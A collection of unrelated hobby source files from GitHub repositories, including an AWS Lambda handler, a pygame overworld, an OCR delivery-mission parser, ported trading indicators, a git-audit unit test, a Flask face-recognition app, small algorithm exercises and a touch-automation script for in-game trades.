test_acc)\n\n","repo_name":"pikishor/QuestionClassifier","sub_path":"QuestionClassifierModel.py","file_name":"QuestionClassifierModel.py","file_ext":"py","file_size_in_byte":6064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"33267677006","text":"import boto3\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\ndynamodb = boto3.resource('dynamodb')\ntable_name = 'table_reservation_app_restaurants' \ntable = dynamodb.Table(table_name)\n\ndef lambda_handler(event, context):\n try:\n # Scanning the DynamoDB table to fetch all restaurants\n logging.info(\"Scanning the DynamoDB table to fetch all restaurants\")\n response = table.scan()\n list_of_restaurants = response['Items']\n \n # Return the list of restaurants as a response\n return {\n 'statusCode': 200,\n 'body': list_of_restaurants\n }\n except Exception as e:\n # Return an error response if something goes wrong\n return {\n 'statusCode': 500,\n 'body': str(e)\n }\n","repo_name":"Sushank13/SDP1_Table_Reservation_App","sub_path":"lambdas/customer-app/list-restaurants/list_restaurants.py","file_name":"list_restaurants.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"27787226938","text":"import pygame\nfrom gamedata import levels \nfrom os import path\nfrom support import import_folder\nfrom decoration import Sky\n\n\nclass Node(pygame.sprite.Sprite):\n #creates nodes for each level\n def __init__(self, pos, status, icon_speed, mypath):\n super().__init__()\n mypaths = path.join(*mypath)\n self.frames = import_folder(mypaths)\n self.frame_index = 0\n self.image = self.frames[self.frame_index] \n if status == 'available':\n self.status = 'available'\n else:\n self.status = 'locked'\n self.rect = self.image.get_rect(center = pos)\n #target rect needs to be h and w = to speed so that icon doesn't over shoot without triggering a collision\n self.detection_zone = pygame.Rect((self.rect.centerx - (icon_speed/2)), (self.rect.centery - (icon_speed/2)), icon_speed, icon_speed)\n \n def animate(self):\n self.frame_index += 0.15\n if self.frame_index >= len(self.frames):\n self.frame_index = 0\n self.image = self.frames[int(self.frame_index)]\n \n def update(self):\n if self.status== 'available':\n self.animate()\n else:\n tint_surface = self.image.copy()\n tint_surface.fill('black', None, pygame.BLEND_RGBA_MULT)\n self.image.blit(tint_surface, (0,0))\n \nclass Icon(pygame.sprite.Sprite):\n def __init__(self, pos):\n super().__init__()\n self.pos = pos\n self.image = pygame.image.load(path.join('graphics', 'overworld', 'hat.png')).convert_alpha()\n self.rect = self.image.get_rect(center = pos)\n \n def update(self):\n #adjusts rect of player icon position to account for int conversion when placing the level rectangle/icon on the screen\n self.rect.center = self.pos\n \nclass Overworld:\n def __init__(self, start_level, max_level, surface, create_level):\n super().__init__()\n #setup\n self.display_surface = surface\n self.max_level = max_level\n self.current_level = start_level\n self.create_level = create_level\n \n #movement logic\n self.moving = False\n self.move_direction = pygame.math.Vector2(0, 0)\n self.speed = 8\n \n #sprites\n self.setup_nodes()\n self.setup_icon()\n self.sky= Sky(8, 'overworld')\n \n #time \n self.start_time = pygame.time.get_ticks()\n self.allow_input = False\n self.timer_length = 300\n \n def setup_nodes(self):\n #creates level nodes and either locks or opens them based on current level completed\n self.nodes = pygame.sprite.Group()\n for index, node_data in enumerate(levels.values()):\n if index <= self.max_level:\n node_sprite = Node(node_data['node_pos'], 'available', self.speed, node_data['node_graphics']) \n else:\n node_sprite = Node(node_data['node_pos'], 'locked', self.speed, node_data['node_graphics'])\n self.nodes.add(node_sprite)\n \n def draw_paths(self):\n #make a list of points up to open level (below max level)\n points = []\n for index, node_data in enumerate(levels.values()):\n if index <= self.max_level:\n points.append(node_data['node_pos'])\n if len(points) > 1: \n pygame.draw.lines(self.display_surface, '#a04f45', False, points, 12)\n \n def setup_icon(self):\n #creates the player sprite\n self.icon = pygame.sprite.GroupSingle()\n icon_sprite = Icon(self.nodes.sprites()[self.current_level].rect.center)\n self.icon.add(icon_sprite)\n \n def input(self):\n #detects if key is being pressed and adjusts the current level accordingly\n keys = pygame.key.get_pressed()\n \n if not self.moving and self.allow_input:\n if keys[pygame.K_RIGHT] and self.current_level < self.max_level:\n self.move_direction = self.get_movement_data('next')\n self.current_level += 1\n self.moving = True\n\n elif keys[pygame.K_LEFT] and self.current_level > 0:\n self.move_direction = self.get_movement_data('last')\n self.current_level -= 1\n self.moving = True\n\n elif keys[pygame.K_SPACE]:\n self.create_level(self.current_level)\n \n def get_movement_data(self, target):\n #calculates the degree of the path between nodes\n start = pygame.math.Vector2(self.nodes.sprites()[self.current_level].rect.center)\n if target == 'next':\n end = pygame.math.Vector2(self.nodes.sprites()[self.current_level + 1].rect.center)\n else:\n end = pygame.math.Vector2(self.nodes.sprites()[self.current_level - 1].rect.center)\n \n return (end - start).normalize()\n \n def update_icon_pos(self):\n #moves icon from one level node to another after player presses key\n if self.moving and self.move_direction:\n self.icon.sprite.pos += self.move_direction * self.speed\n target_node = self.nodes.sprites()[self.current_level]\n if target_node.detection_zone.collidepoint(self.icon.sprite.pos):\n self.moving = False\n self.move_direction = pygame.math.Vector2(0, 0)\n\n def input_timer(self):\n #creates a pause/no input time after overworld created \n if not self.allow_input:\n current_time = pygame.time.get_ticks()\n if current_time >= self.start_time + self.timer_length:\n self.allow_input = True\n \n def run(self):\n self.input_timer()\n self.input()\n self.update_icon_pos()\n self.icon.update()\n self.nodes.update()\n self.sky.draw(self.display_surface)\n self.draw_paths()\n self.nodes.draw(self.display_surface)\n self.icon.draw(self.display_surface)\n","repo_name":"J-Currier/platformer","sub_path":"overworld.py","file_name":"overworld.py","file_ext":"py","file_size_in_byte":6006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"1778423933","text":"import re\nfrom PIL import Image\n\nfrom recognition import DeliveryOCR\nfrom graph import Region, Location, Package, DeliveryVerse\n\nSTART_WITH_ANY = \"\"\nGENERIC_TEMPLATES = {\n \"simple_contract\": {\n \"pickup_headers\": [\"PACKAGE FOR PICK UP\", \"PACKAGES FOR PICK UP \\(ANY ORDER\\)\"],\n \"pickup_package\": [\"Package \\#(?P.*) from (?P.*) on (?P.*)\"],\n \"dropoff_headers\": [\"DROP OFF LOCATION\", \"DROP OFF LOCATIONS \\(ANY ORDER\\)\"],\n \"dropoff_package\": [\"Package \\#(?P.*) to (?P.*) on (?P.*)\"]\n },\n \"one_to_n\": {\n \"pickup_headers\": [\"PACKAGE FOR PICK UP\", \"PACKAGES FOR PICK UP \\(ANY ORDER\\)\"],\n \"pickup_package\": [\"Collect all packages from (?P.*) on (?P.*)\"],\n \"dropoff_headers\": [\"DROP OFF LOCATION\", \"DROP OFF LOCATIONS \\(ANY ORDER\\)\"],\n \"dropoff_package\": [\"Package \\#(?P.*) to (?P.*) on (?P.*)\"]\n }\n}\nPER_COMPANY_TEMPLATES = {\n \"covalex\": {\n \"simple_contract\": {\n \"titles\": [\"Covalex Evaluation\", \"Covalex Local Delivery Route\"],\n \"pickup_headers\": GENERIC_TEMPLATES[\"simple_contract\"][\"pickup_headers\"],\n \"pickup_package\": GENERIC_TEMPLATES[\"simple_contract\"][\"pickup_package\"],\n \"dropoff_headers\": GENERIC_TEMPLATES[\"simple_contract\"][\"dropoff_headers\"],\n \"dropoff_package\": GENERIC_TEMPLATES[\"simple_contract\"][\"dropoff_package\"]\n },\n \"one_to_n\": {\n \"titles\": [\"Shipping Error - QT Sensitive Cargo\"],\n \"pickup_headers\": GENERIC_TEMPLATES[\"one_to_n\"][\"pickup_headers\"],\n \"pickup_package\": GENERIC_TEMPLATES[\"one_to_n\"][\"pickup_package\"],\n \"dropoff_headers\": GENERIC_TEMPLATES[\"one_to_n\"][\"dropoff_headers\"],\n \"dropoff_package\": GENERIC_TEMPLATES[\"one_to_n\"][\"dropoff_package\"]\n }\n }\n}\nCOMPANY_TO_PROPER_NAME = {\n \"covalex\": \"Covalex Shipping\"\n}\n\nGROUP_EXPRESSION = \"\\(\\?P\"\n\n\nclass LocationDetection:\n def __init__(self, name: str, region: str):\n self.name = name\n self.region = region\n\nclass PickupDetection:\n def __init__(self, name: str, location: LocationDetection):\n self.name = name\n self.location = location\n\nclass DropoffDetection:\n def __init__(self, name: str, location: LocationDetection):\n self.name = name\n self.location = location\n\nclass PackageDetection:\n def __init__(self, name: str, pickup_location: LocationDetection, dropoff_location: LocationDetection):\n self.name = name\n self.pickup_location = pickup_location\n self.dropoff_location = dropoff_location\n\nclass DeliveryDetections:\n def __init__(self, verse: DeliveryVerse, mission: int, company: str, contract: str):\n self.verse = verse\n self.mission = mission\n self.company = company\n self.contract = contract\n\n self.pickups = {}\n self.dropoffs = {}\n\n self.locations = {}\n self.packages = {}\n\n def add_detection(self, package: str, location: str, region: str, task: str):\n if task == \"pickup\":\n self.pickups[package] = PickupDetection(package, self.__try_add_location(location, region))\n elif task == \"dropoff\":\n if self.pickups.get(package, None):\n self.__add_dropoff_detection(package, location, region)\n elif len(self.pickups) > len(self.dropoffs):\n pickup_name = self.pickups[list(self.pickups.keys())[len(self.dropoffs)]].name\n self.__add_dropoff_detection(pickup_name, location, region)\n else:\n print(f\"[ERROR] Differing pickup ({len(self.pickups)}) and dropoff ({len(self.dropoffs) + 1}+) task counts, aborting\")\n exit()\n\n def confirm_detections(self):\n for location in self.locations.values():\n self.__apply_verse_location(location)\n for package in self.packages.values():\n self.__apply_verse_package(package)\n\n def __try_add_location(self, location: str, region: str):\n if not self.locations.get(location, None):\n self.locations[location] = LocationDetection(location, region)\n return self.locations[location]\n \n def __add_dropoff_detection(self, package: str, location: str, region: str):\n self.dropoffs[package] = DropoffDetection(package, self.__try_add_location(location, region))\n self.packages[package] = PackageDetection(package, self.pickups[package].location, self.dropoffs[package].location)\n\n def __apply_verse_location(self, location: LocationDetection):\n if not self.verse.regions.get(location.region, None):\n self.verse.regions[location.region] = Region(location.region)\n if not self.verse.locations.get(location.name, None):\n self.verse.locations[location.name] = Location(location.name, self.verse.regions[location.region])\n\n def __apply_verse_package(self, package: PackageDetection):\n self.verse.packages[package.name] = Package(self.mission, package.name, \n self.verse.locations[package.pickup_location.name], \n self.verse.locations[package.dropoff_location.name])\n\n\nclass DeliveryParser:\n def __init__(self, verse: DeliveryVerse):\n self.verse = verse\n self.detections = []\n\n def get_delivery_company_and_contract(self, title: str):\n for company, contracts in PER_COMPANY_TEMPLATES.items():\n for contract in contracts.keys():\n for template in contracts[contract][\"titles\"]:\n finds = re.findall(template, title)\n if len(finds) > 0:\n return company, contract\n print(f\"[WARN] No template matches title '{title}'\")\n\n def get_headers_index(self, detections: DeliveryDetections, task: str, lines: list, start_index=0):\n for index in range(start_index, len(lines)):\n for template in PER_COMPANY_TEMPLATES[detections.company][detections.contract][f\"{task}_headers\"]:\n finds = re.findall(template, lines[index])\n if len(finds) > 0:\n return index\n print(f\"[WARN] No line found containing {COMPANY_TO_PROPER_NAME[detections.company]} {task} headers\")\n return start_index\n\n def match_line_to_package_template(self, detections, task, line):\n for template in PER_COMPANY_TEMPLATES[detections.company][detections.contract][f\"{task}_package\"]:\n matches = re.match(f\".*{template}\", line)\n group_count = len(re.findall(GROUP_EXPRESSION, template))\n if matches and len(matches.groups()) == group_count:\n detections.add_detection(matches.group(\"name\"), matches.group(\"location\"), matches.group(\"region\"), task)\n return True, group_count\n return False, -1\n\n def get_packages_and_index(self, detections: DeliveryDetections, task: str, lines: list, start_index: int):\n matched = False\n for index in range(start_index, len(lines)):\n line_matched = False\n group_count = 0\n if lines[index] != \"\":\n line_matched, group_count = self.match_line_to_package_template(detections, task, lines[index])\n if line_matched:\n matched = True\n else:\n if lines[index] != \"\":\n print(f\"[WARN] Could not find all {group_count} field{'s' if group_count != 1 else ''} for {task} delivery '{lines[index]}', this will cause dragons\")\n if matched:\n return index\n if not matched:\n print(f\"[WARN] Could not find any packages for {task} task, this will cause dragons\")\n return start_index\n \n\n def detect_deliveries(self, mission: int, image: Image):\n ocr = DeliveryOCR(image)\n print(f\"[INFO] Processing image {mission + 1}\")\n\n company, contract = self.get_delivery_company_and_contract(ocr.texts[\"title\"])\n detections = DeliveryDetections(self.verse, mission, company, contract)\n self.detections.append(detections)\n lines = ocr.texts[\"text\"].split(\"\\n\")\n pickup_headers_index = self.get_headers_index(detections, \"pickup\", lines)\n last_pickup_index = self.get_packages_and_index(detections, \"pickup\", lines, pickup_headers_index + 1)\n dropoff_headers_index = self.get_headers_index(detections, \"dropoff\", lines, last_pickup_index + 1)\n self.get_packages_and_index(detections, \"dropoff\", lines, dropoff_headers_index + 1)","repo_name":"NotToDisturb/Express","sub_path":"parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":8643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74508348846","text":"from jesse.helpers import get_candle_source, slice_candles\nimport numpy as np\nfrom numba import njit, jit\nimport talib \nfrom typing import Union\nfrom jesse.helpers import get_config\n\n\"\"\"\nhttps://www.tradingview.com/script/a7062wqw-Adaptive-Trend-Cipher-loxx/\n\"\"\"\n\ndef adaptive_length(candles: np.ndarray,b_corr:bool=False,smooth:int = 8,bp_period: int =13, bandwidth:float=0.20, LPPeriod: int = 20,hilbert_len:int=7, alpha : float = 0.07,adaptive_alg: str = \"band pass\", smoothing: bool = False, source_type: str = \"hl2\", sequential: bool = False) -> Union[float, np.ndarray]:\n candles1 = slice_candles(candles, sequential)\n source = get_candle_source(candles1, source_type=source_type)\n if adaptive_alg == \"icp\":\n f_ICP, smoothICP = func_icp(source,smooth)\n if smoothing == True:\n adaptive = smoothICP\n else:\n adaptive = f_ICP\n elif adaptive_alg == \"hilbert_dual\":\n hilbert_dual = func_hilbert_dual(source,LPPeriod)\n adaptive = hilbert_dual\n elif adaptive_alg == \"hilbert\":\n hilbert = func_hilbert(source,hilbert_len,alpha)\n adaptive = hilbert\n elif adaptive_alg == \"band pass\":\n bandpass = func_bandpass(source,bp_period,bandwidth)\n adaptive = bandpass\n else:\n print(\"value error\")\n # elif \n if b_corr:\n corr = correlation(source,candles,int(adaptive[-1]))\n else:\n corr = np.zeros(2)\n if sequential:\n return adaptive,corr\n else:\n return adaptive[-1],corr[-1]\n\n@njit\ndef func_icp(source,smooth):\n RADIANtoDEGREES = 90.0 / np.arcsin(1.0)\n SQRT2xPI = np.sqrt(2.0) * np.arcsin(1.0) * 2.0\n detrend = np.zeros(source.shape[0])\n inPhase = np.zeros(source.shape[0])\n quadrature = np.zeros(source.shape[0])\n divisor = np.zeros(source.shape[0])\n phase = np.zeros(source.shape[0])\n deltaPhase = np.zeros(source.shape[0])\n smoothICP = np.zeros(source.shape[0])\n f_ICP = np.zeros(source.shape[0])\n alpha = SQRT2xPI / smooth \n beta = np.exp(-alpha)\n gamma = -beta* beta\n delta = 2.0 * beta * np.cos(alpha)\n for i in range(81,source.shape[0]):\n detrend[i] = source[i] - source[i-7]\n inPhase[i] = 1.25 * (detrend[i-4] - 0.635 * detrend[i-2]) + 0.635 * inPhase[i-3]\n quadrature[i] = detrend[i-2] - 0.338 * detrend[i] + 0.338 * quadrature[i-2]\n divisor[i] = inPhase[i] + inPhase[i-1]\n phase[i] = RADIANtoDEGREES * np.arctan(np.abs((quadrature[i] + quadrature[i-1])/divisor[i])) if divisor[i] != 0.0 else 0.0\n if (inPhase[i] < 0.0 and quadrature[i] > 0.0):\n phase[i] = 180.0 - phase[i]\n if (inPhase[i] < 0.0 and quadrature[i] < 0.0):\n phase[i] = 180.0 + phase[i]\n if (inPhase[i] > 0.0 and quadrature[i] < 0.0):\n phase[i] = 360 - phase[i] \n deltaPhase[i] = phase[i-1] - phase[i] \n if (phase[i-1] < 90 and phase[i] > 270):\n deltaPhase[i] = 360 + phase[i-1] - phase[i] \n deltaPhase[i] = np.maximum(1.0, np.minimum(60.0,deltaPhase[i]))\n E = 0.0\n ICP = 0.0\n for j in range(81):\n E = E + deltaPhase[i-j]\n if (E > 360.0 and ICP == 0):\n ICP = (j)\n break \n f_ICP[i] = ICP\n if (f_ICP[i]==0):\n f_ICP[i] = f_ICP[i-1]\n smoothICP[i] = (1.0 - delta - gamma) * f_ICP[i] + delta * smoothICP[i-1] + gamma * smoothICP[i-2]\n f_ICP[i] = np.maximum(6,f_ICP[i])\n smoothICP[i] = np.maximum(6,smoothICP[i])\n return detrend, np.floor(smoothICP)\n\n@njit(fastmath = True)\ndef func_hilbert_dual(source, LPPeriod): \n max_len = 80\n min_len = 6\n alpha = (np.cos(0.707 * 2 * np.pi / max_len) + np.sin(0.707 * 2 * np.pi / max_len) - 1) / np.cos(0.707 * 2 * np.pi / max_len)\n a1 = np.exp(-np.sqrt(2) * np.pi / LPPeriod)\n b1 = 2 * a1 * np.cos(np.sqrt(2) * np.pi / LPPeriod)\n c2 = b1 \n c3 = -a1 * a1 \n c1 = 1 - c2 - c3 \n HP = np.zeros(source.shape[0])\n Filt = np.zeros(source.shape[0])\n IPeak = np.zeros(source.shape[0])\n Real = np.zeros(source.shape[0])\n Quad = np.zeros(source.shape[0])\n QPeak = np.zeros(source.shape[0])\n Imag = np.zeros(source.shape[0])\n IDot = np.zeros(source.shape[0])\n QDot = np.zeros(source.shape[0])\n Period = np.zeros(source.shape[0])\n DomCycle = np.zeros(source.shape[0])\n for i in range(source.shape[0]):\n HP[i] = (1 - alpha / 2) * (1 - alpha / 2) * (source[i] - 2 * source[i-1] + source[i-2]) + 2 * (1 - alpha) * HP[i-1] - (1 - alpha) * (1 - alpha) * HP[i-2]\n Filt[i] = c1 * (HP[i] + HP[i-1]) / 2 + c2 * Filt[i-1] + c3 * Filt[i-2] \n IPeak[i] = 0.991 * IPeak[i-1] \n IPeak[i] = np.abs(Filt[i]) if np.abs(Filt[i]) > IPeak[i] else IPeak[i]\n Real[i] = Filt[i] / IPeak[i] \n Quad[i] = Real[i] - Real[i-1] \n QPeak[i] = 0.991 * QPeak[i-1] \n QPeak[i] = np.abs(Quad[i]) if np.abs(Quad[i]) > QPeak[i] else QPeak[i]\n Imag[i] = Quad[i] / QPeak[i] \n IDot[i] = Real[i] - Real[i-1] \n QDot[i] = Imag[i] - Imag[i-1] \n Period[i] = 2 * np.pi * (Real[i] * Real[i] + Imag[i] * Imag[i]) / (-Real[i] * QDot[i] + Imag[i] * IDot[i]) if Real[i] * QDot[i] - Imag[i] * IDot[i] != 0 else Period[i-1] \n Period[i] = np.minimum(np.maximum(Period[i],min_len),max_len)\n DomCycle[i] = c1 * (Period[i] + Period[i-1]) / 2 + c2 * DomCycle[i-1] + c3 * DomCycle[i-2] \n return np.floor(DomCycle)\n\n#might not be accurate\n@njit(fastmath=True)\ndef correlation(x,candles,len1):\n min_len = 6\n max_len = 80\n meanx = np.zeros(x.shape[0])\n meany = np.zeros(x.shape[0]) \n output = np.zeros(x.shape[0])\n y = np.zeros(x.shape[0])\n for i in range(len1,x.shape[0]):\n y[i] = candles.shape[0] - i\n meanx[i] = np.mean(x[i-(len1-1):i+1])\n meany[i] = np.mean(y[i-(len1-1):i+1])\n sumx = 0.0\n sumy = 0.0\n sumxy = 0.0\n for j in range(max_len):\n sumxy = (sumxy +x[i-j] - meanx[i]) * y[i-j] - meany[i]\n sumx = sumx + np.power(x[i-j] - meanx[i],2)\n sumy = sumy + np.power(y[i-j] - meany[i], 2)\n output[i] = sumxy / np.sqrt(sumy * sumx)\n return output\n\n#not accurate; np.percentile replaced with cheap alternative \n@njit(fastmath=True)\ndef func_hilbert(source,hilbert_len,alpha):\n smooth = np.zeros(source.shape[0])\n cycle = np.zeros(source.shape[0])\n period = np.zeros(source.shape[0])\n q1 = np.zeros(source.shape[0])\n deltaPhase = np.zeros(source.shape[0])\n medianDelta = np.zeros(source.shape[0])\n dc = np.zeros(source.shape[0])\n instPeriod = np.zeros(source.shape[0])\n WMA = np.zeros(source.shape[0])\n index = (np.int(np.floor(hilbert_len/2)))\n for i in range(hilbert_len,source.shape[0]):\n smooth[i] = (source[i] + 2 * source[i-1] + 2 * source[i-2] + source[i-3]) / 6 \n cycle[i] = (1- 0.5 * alpha) * (1 - 0.5 * alpha) * (smooth[i] - 2 * smooth[i-1] + smooth[i-2]) + 2 * (1 - alpha) * cycle[i-1] - (1 - alpha) * (1 - alpha) * cycle[i-2]\n q1[i] = (0.0962 * cycle[i] + 0.5769 * cycle[i-2] - 0.5769 * cycle[i-4] - 0.0962 * cycle[i-6]) * (0.5 + 0.08 * instPeriod[i-1])\n deltaPhase[i] = (cycle[i-3] / q1[i] - cycle[i-4] / q1[i-1]) / (1 + cycle[i-3] * cycle[i-4] / (q1[i] * q1[i-1])) if q1[i] != 0 and q1[i-1] != 0 else 0 \n deltaPhase[i] = np.minimum(np.maximum(deltaPhase[i],0.1),1.1)\n medianDelta[i] = deltaPhase[i-index] #np.percentile(deltaPhase[i-(hilbert_len-1):i+1],50)\n dc[i] = np.pi * 2 / medianDelta[i] + 0.5 if medianDelta[i] != 0 else 15\n instPeriod[i] = 0.33 * dc[i] + 0.67 * (instPeriod[i-1])\n period[i] = 0.15 * instPeriod[i] + 0.85 * period[i-1] \n weight = 0.0\n norm = 0.0 \n sum1 = 0.0\n for j in range(4):\n weight = (4 - j)*4\n norm = norm + weight \n sum1 = sum1 + period[i-j] * weight \n WMA[i] = np.floor(sum1/norm)\n return np.floor(WMA) \n \n#not accurate\n@njit(fastmath=True)\ndef func_bandpass(source,bp_period,bpw):\n alpha2 = (np.cos(0.25*bpw*2*np.pi/bp_period) + np.sin(0.25 * bpw * 2 * np.pi / bp_period) - 1) / np.cos(0.25 * bpw * 2 * np.pi / bp_period)\n beta1 = (np.cos(2*np.pi/bp_period))\n gamma1 = 1 / np.cos(2 * np.pi * bpw / bp_period)\n alpha1 = gamma1 - np.sqrt(gamma1 * gamma1 - 1)\n HP = np.zeros(source.shape[0])\n BP = np.zeros(source.shape[0])\n Peak = np.zeros(source.shape[0])\n Real = np.zeros(source.shape[0])\n DC = np.zeros(source.shape[0])\n counter = np.zeros(source.shape[0])\n for i in range(bp_period,source.shape[0]):\n HP[i] = (1 + alpha2 / 2) * (source[i] - source[i-1]) + (1 - alpha2) * HP[i-1]\n BP[i] = 0.5 * (1 - alpha1) * (HP[i] - HP[i-2]) + beta1 * (1 + alpha1) * BP[i-1] - alpha1 * BP[i-2]\n Peak[i] = 0.991 * Peak[i-1]\n Peak[i] = np.abs(BP[i]) if np.abs(BP[i]) > Peak[i] else Peak[i] \n Real[i] = BP[i] / Peak[i] if Peak[i] != 0 else Real[i-1]\n DC[i] = 6 if DC[i-1] < 6 else DC[i-1] \n counter[i] = counter[i-1] + 1 \n if (Real[i] > 0 and Real[i-1] < 0) or (Real[i] < 0 and Real[i-1] > 0):\n DC[i] = 2 * counter[i] \n if 2 * counter[i] > 1.25 * DC[i-1]:\n DC[i] = 1.25 * DC[i-1] \n if 2 * counter[i] > 1.25 * DC[i-1]:\n DC[i] = 1.25 * DC[i-1] \n if 2 * counter[i] < 0.8 * DC[i-1]: \n DC[i] = 0.8 * DC[i-1] \n counter[i] = 0 \n return np.floor(DC) ","repo_name":"DanielLiszka/Ported-Pinescript-Indicators-for-Jesse","sub_path":"ported_indicators/adaptive_lengths.py","file_name":"adaptive_lengths.py","file_ext":"py","file_size_in_byte":9491,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"4435826518","text":"from unittest import TestCase\n\nfrom gitaudit.git.change_log_entry import ChangeLogEntry\nfrom gitaudit.analysis.merge_diff.merge_diff import get_head_base_hier_logs\n\nMAIN_JSON_LOG = [\n {\n \"sha\": \"d\",\n \"parent_shas\": [\"c\"],\n },\n {\n \"sha\": \"c\",\n \"parent_shas\": [\"b\"],\n },\n {\n \"sha\": \"b\",\n \"parent_shas\": [\"a\"],\n },\n {\n \"sha\": \"a\",\n \"parent_shas\": [],\n },\n]\n\nRELEASE_JSON_LOG = [\n {\n \"sha\": \"f\",\n \"parent_shas\": [\"e\"],\n },\n {\n \"sha\": \"e\",\n \"parent_shas\": [\"b\"],\n },\n {\n \"sha\": \"b\",\n \"parent_shas\": [\"a\"],\n },\n {\n \"sha\": \"a\",\n \"parent_shas\": [],\n },\n]\n\n\nclass MockGit:\n def __init__(\n self,\n ) -> None:\n self.ref_logs = {}\n\n def append_ref(self, name, json_log):\n self.ref_logs[name] = json_log\n self.ref_logs[json_log[0][\"sha\"]] = json_log\n\n def log_parentlog(self, end_ref):\n return list(\n map(\n lambda x: ChangeLogEntry.parse_obj(x),\n self.ref_logs[end_ref],\n )\n )\n\n def log_changelog(self, end_ref, start_ref=False, first_parent=False, patch=False):\n return list(\n map(\n lambda x: ChangeLogEntry.parse_obj(x),\n self.ref_logs[end_ref],\n )\n )\n\n\nclass TestGetHeadBaseHierLogs(TestCase):\n def test_normal(self):\n mock_git = MockGit()\n mock_git.append_ref(\"main\", MAIN_JSON_LOG)\n mock_git.append_ref(\"release\", RELEASE_JSON_LOG)\n\n head, base = get_head_base_hier_logs(mock_git, \"release\", \"main\")\n self.assertListEqual(\n list(map(lambda x: x.sha, head)),\n [\"f\", \"e\"],\n )\n self.assertListEqual(\n list(map(lambda x: x.sha, base)),\n [\"d\", \"c\"],\n )\n","repo_name":"MatthiasRieck/gitaudit","sub_path":"tests/test_analysis/test_merge_diff/test_merge_diff.py","file_name":"test_merge_diff.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"17008480238","text":"#If we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.\n#Find the sum of all the multiples of 3 or 5 below 1000.\n\n#For all numbers that are less than 1000 but are multples of 3 or 5 we add them to an array\n#We then sum the array elements\n\ny = []\nz = []\ni = 999\n\nwhile 0 < i:\n y.append(i)\n i -= 1\n\n#print(y)\n\nfor x in y:\n if x % 3 == 0 or x % 5 == 0:\n z.append(x)\n\n#print(z)\n\nans = sum(z)\nprint(ans)\n\n#solved\n#ans = 233168\n","repo_name":"MattKatt2001/Code","sub_path":"Euler/Euler_1.py","file_name":"Euler_1.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"1581069313","text":"# -*- coding=utf-8 -*-\n# python37\nimport os\nfrom webapp.models import User\nfrom webapp.face_handler import get_face_feature\nimport json\nimport time\nfrom webapp import app, db\n\ndb_path = 'webapp/users.db'\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp.config['SECRET_KEY'] = 'you-will-never-guess'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, db_path)\n\nif not os.path.isfile(db_path):\n db.create_all()\n face_cache = 'FacePhotos'\n if len(os.listdir(face_cache)) > 0:\n for index, face_image_file in enumerate(os.listdir(face_cache)):\n username = face_image_file.split('_')[0]\n face_image = os.path.join(face_cache, face_image_file)\n feature = json.dumps(list(get_face_feature(face_image)))\n user = User(\n id=int(1000 * time.time()),\n username=username,\n feature=feature\n )\n db.session.add(user)\n db.session.commit()\napp.run(debug=True)\n","repo_name":"TitusWongCN/DeepLearning","sub_path":"face_rec_system/flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"26183454232","text":"'''\nCreated on Feb 14, 2017\n\n@author: Ben Rose\n'''\n\n'''LCS: Longest Common String'''\n\ndef LCS(string1,string2):\n if string1 == '' or string2 == '':\n return 0\n elif string1[0] == string2[0]:\n return 1 + LCS(string1[1:],string2[1:])\n else:\n useString1 = LCS(string1,string2[1:])\n useString2 = LCS(string1[1:],string2)\n return max(useString1,useString2)\n","repo_name":"benrose258/Python","sub_path":"Python 3.6 Files/Personal Projects/LCSPractice.py","file_name":"LCSPractice.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23058879355","text":"#Trade Script by Misl3d\nfrom zxtouch.client import zxtouch \nfrom zxtouch.touchtypes import *\nimport time\n\n#DEVICE IP \ndevice = zxtouch(\"192.168.1.177\")\n\n#Button Coordinates\nTradeButton = (\"600\", \"1150\")\nPokemonSelect = (\"50\", \"450\")\nNextButton = (\"375\", \"1075\")\nConfirmButton = (\"45\", \"680\")\nXButton = (\"375\", \"1230\")\n\n#Button Colors\nTradeButtonColor = (True, {'red': '240', 'green': '255', 'blue': '255'})\nPokemonSelectColor = (True, {'red': '253', 'green': '255', 'blue': '253'})\nNextButtonColor = (True, {'red': '115', 'green': '214', 'blue': '157'})\nConfirmButtonColor = (True, {'red': '105', 'green': '208', 'blue': '146'})\nXButtonColor = (True, {'red': '29', 'green': '133', 'blue': '149'})\n\ndef tap(x,y):\n device.touch(1, 1, x, y) \n device.accurate_usleep(20000)\n device.touch(0, 1, x, y) \ndef pause(milsec):\n device.accurate_usleep(milsec)\ndef Press(Button, Color):\n x = int(Button[0])\n y = int(Button[1])\n result = device.pick_color(x,y)\n\n print(\"Looking for Button\")\n \n while 1:\n result = device.pick_color(x,y)\n if result == Color:\n pause(500000)\n print (\"Found Button! \\n Pressing!\")\n tap(x,y)\n pause(1000000)\n break\ndef trade():\n Press(TradeButton, TradeButtonColor)\n Press(PokemonSelect, PokemonSelectColor)\n Press (NextButton, NextButtonColor) \n Press (ConfirmButton, ConfirmButtonColor)\n Press (XButton, XButtonColor)\n\ndef start():\n print(\"Starting Trade Bot by Misl3d\")\n trades = 0\n maxtrades = int(input(\"How many trades? \\n\"))\n while maxtrades > trades:\n trades += 1 \n print(\"\\n Trade #\" + str(trades))\n trade()\n print(\"\\n Trading Complete!\") \n\nstart()\nexit() 